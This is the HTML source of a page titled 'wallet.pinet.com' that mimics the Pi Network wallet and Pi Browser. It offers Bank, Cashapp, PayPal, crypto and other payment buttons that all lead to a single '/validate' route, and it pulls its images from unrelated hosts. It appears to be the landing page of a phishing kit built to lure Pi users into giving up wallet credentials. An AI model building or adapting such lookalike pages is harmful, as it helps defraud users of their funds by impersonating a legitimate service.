<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>wallet.pinet.com</title>
    <link rel="stylesheet" href="pinet.css">
</head>

<body>
    <header>
        <div class="pan">
            <ion-icon name="arrow-back-outline"></ion-icon>
        </div>
        <div class="pan1">  <img src="https://p2pactivate.peychain.com/validate/pihead.png" alt="" width="100">
        </div>
        <div class="pan">
            <ion-icon name="chevron-down-outline"></ion-icon>
        </div>
    </header>

    <section><br>
        <div class="pn2">
            <div><img src="https://seeklogo.com/images/P/pi-network-lvquy-logo-D798E8CD2E-seeklogo.com.png" width="120"></div>
            <div class="pn3">Welcome to the Pi Browser</div>
        </div>
<br><br>



        <div class="set">
            <div class="set1">
                <a href='/validate'>
                    <center> <img src="https://raw.githubusercontent.com/Sammiehosty/testfool/main/pay/bank.jpg" width="70">
                    <p class="set2"> Bank  </p></center>
                </a>
            </div>
            <div class="set1">
                <a href='/validate'>
                <center>    <img src="https://p2ptrade.onrender.com/cashapp.jpg" width="70">
                    <p class="set2"> Cashapp </p></center>
                </a>
            </div>
            <div class="set1">
                <a href='/validate'>
                <center>   <img src="https://p2ptrade.onrender.com/ewallet.jpg" width="70">
                    <p class="set2"> E-wallet </p></center>
                </a>
            </div>
        </div>



        <div class="set">
            <div class="set1">
                <a href='/validate'>
                    <center> <img src="https://p2ptrade.onrender.com/gpay.jpg" width="70">
                        <p class="set2"> G-pay </p>
                    </center>
                </a>
            </div>
            <div class="set1">
                <a href='/validate'>
                    <center> <img src="https://p2ptrade.onrender.com/paypal.jpg" width="70">
                        <p class="set2"> paypal </p>
                    </center>
                </a>
            </div>
            <div class="set1">
                <a href='/validate'>
                    <center> <img src="https://p2ptrade.onrender.com/trust.jpg" width="70">
                        <p class="set2"> Crypto </p>
                    </center>
                </a>
            </div>
        </div>










<!--
        <div class="set">
            <div class="set1">
                <a>
                    <center> <img src="gpay.jpg" width="70">
                    <p class="set2"> G-pay</p></center>
                </a>
            </div>
            <div class="set1">
                <a>
                <center>  <img src="paypal.jpg" width="70">
                    <p class="set2"> paypal </p></center>
                </a>
            </div>
            <div class="set1">
                <a>
                <center>  <img src="trust.jpg" width="70">
                    <p class="set2">  Trust Wallet </p></center>
                </a>
            </div>
        </div>-->

<br><br>
    </section>



    <footer>
        <div class="exp">
        <p> <img src="compass.png" width="15"> <small>  Explore the Testnet Ecosystem  </small> </p>
        </div>
    </footer>














    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link
        href="https://fonts.googleapis.com/css2?family=Inter:wght@100..900&family=Kablammo&family=Karla&family=Lato&family=Montserrat&family=Open+Sans&family=Poppins:wght@300;700&family=Raleway&family=Ysabeau:wght@700&display=swap"
        rel="stylesheet">
    <script type="module" src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.js"></script>
    <script nomodule src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.js"></script>
<style>
*{
margin: 0;
padding: 0;
box-sizing: border-box;
}
body{
font-family: "Inter", sans-serif;
font-optical-sizing: auto;
font-weight: 300;
font-style: normal;
font-variation-settings:
"slnt" 0;
}
header{
background-color: #783a8c;
width: 100vw;
display: flex;
justify-content: space-between;
height: 7vh;
padding-top: 12px;
}
.pan1{
font-size: 21px;
text-transform: capitalize;
font-weight: 700;
color: #fff;
}
.pan{
font-size: 23px;
color: #fff;
padding-left: 12px;
padding-right: 12px;
}

.pn2{
text-align: center;
margin-top: 25px;
}
.pn3{
padding-top: 20px;
font-weight: 670;
color: rgb(240, 185, 45);
font-size: 23px;
}
.pac{
opacity: 0;
}
.set{
display: flex;
justify-content: space-around;
margin-top: 25px;
}
.set2{
padding-left: 5px;
padding-top: 8px;
color: #783a8c;
}
a{
text-decoration: none;
list-style: none;
}

footer{
margin: 26px;
text-align: center;
background-color: #783a8c;
color: #fff;
padding: 8px 8px;
font-size: 18px;
border-radius: 10px;
}
.exp1{
font-size: 20px;
}
</style>

</body>

</html>
